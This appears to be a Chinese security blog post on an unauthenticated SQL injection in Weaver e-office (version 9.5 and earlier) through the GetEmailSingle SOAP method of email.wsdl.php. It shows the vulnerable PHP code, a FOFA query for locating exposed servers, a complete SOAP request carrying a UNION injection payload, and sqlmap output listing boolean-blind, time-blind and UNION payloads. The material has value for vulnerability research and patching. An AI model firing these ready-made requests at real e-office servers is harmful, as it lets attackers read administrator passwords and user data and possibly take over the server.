泛微e-office email.wsdl.php sql注入漏洞


漏洞简介

泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office email.wsdl.php 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

影响版本

e-office <=9.5

fofa语句

app="泛微-EOffice"

漏洞分析

同样通过解析 wsdl 后有很多功能

webservice-json/email/email.wsdl.php 的 GetEmailSingle 业务逻辑如下

function GetEmailSingle( $id, $box )
{
    global $attachment_url;
    $email = authcheck( array( ) );
    $Infor = array( );
    $data = $email->getEmailById( $id, $box );

$id, $box 首先带入 getEmailById 函数

public function getEmailById( $id, $box = "" )
{
  global $connection;
  $sql = " select * from email where email_id = '{$id}' ";
  $cursor = exequery( $connection, $sql );

$id 被直接拼接进SQL语句后执行,无任何过滤校验,造成SQL注入漏洞。

漏洞复现

POST /webservice-json/email/email.wsdl.php HTTP/1.1
User-Agent: Apache-HttpClient/4.5.5 (Java/17.0.12)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
SOAPAction: urn:EmailServicewsdl#GetEmailSingle
Content-Type: text/xml;charset=UTF-8
Host: eoffice.mrxn.net:8082

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:EmailServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:GetEmailSingle soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <id xsi:type="xsd:string">3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b6b71,0x4b6453444f4253756546476e51716974767a57664c61657a616b4e6e5065414d676c6a6473525876,0x717a706a71)#</id>
         <box xsi:type="xsd:string">gero</box>
      </urn:GetEmailSingle>
   </soapenv:Body>
</soapenv:Envelope>

成功在响应回显联合注入payload

sqlmap 结果如下

sqlmap identified the following injection point(s) with a total of 201 HTTP(s) requests:
---
Parameter: SOAP #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:EmailServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:GetEmailSingle soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <id xsi:type="xsd:string">3' RLIKE (SELECT (CASE WHEN (6754=6754) THEN 3 ELSE 0x28 END))-- wGmX</id>
         <box xsi:type="xsd:string">gero</box>
      </urn:GetEmailSingle>
   </soapenv:Body>
</soapenv:Envelope>

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:EmailServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:GetEmailSingle soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <id xsi:type="xsd:string">3' AND 6981=BENCHMARK(5000000,MD5(0x4c6e4c70))-- CxQt</id>
         <box xsi:type="xsd:string">gero</box>
      </urn:GetEmailSingle>
   </soapenv:Body>
</soapenv:Envelope>

    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:EmailServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:GetEmailSingle soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <id xsi:type="xsd:string">3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b6b71,0x4b6453444f4253756546476e51716974767a57664c61657a616b4e6e5065414d676c6a6473525876,0x717a706a71)#</id>
         <box xsi:type="xsd:string">gero</box>
      </urn:GetEmailSingle>
   </soapenv:Body>
</soapenv:Envelope>
---

其他

burp wsdler 插件默认解析或者soap本身解析的参数是 int 类型,不妨手动更改成string类型,当后端校验不足时,说不定有意外收获!


手机扫码阅读

DedeCMS V5.7.117(最新版) RCE

泛微e-office login.wsdl.php sql注入漏洞

评 论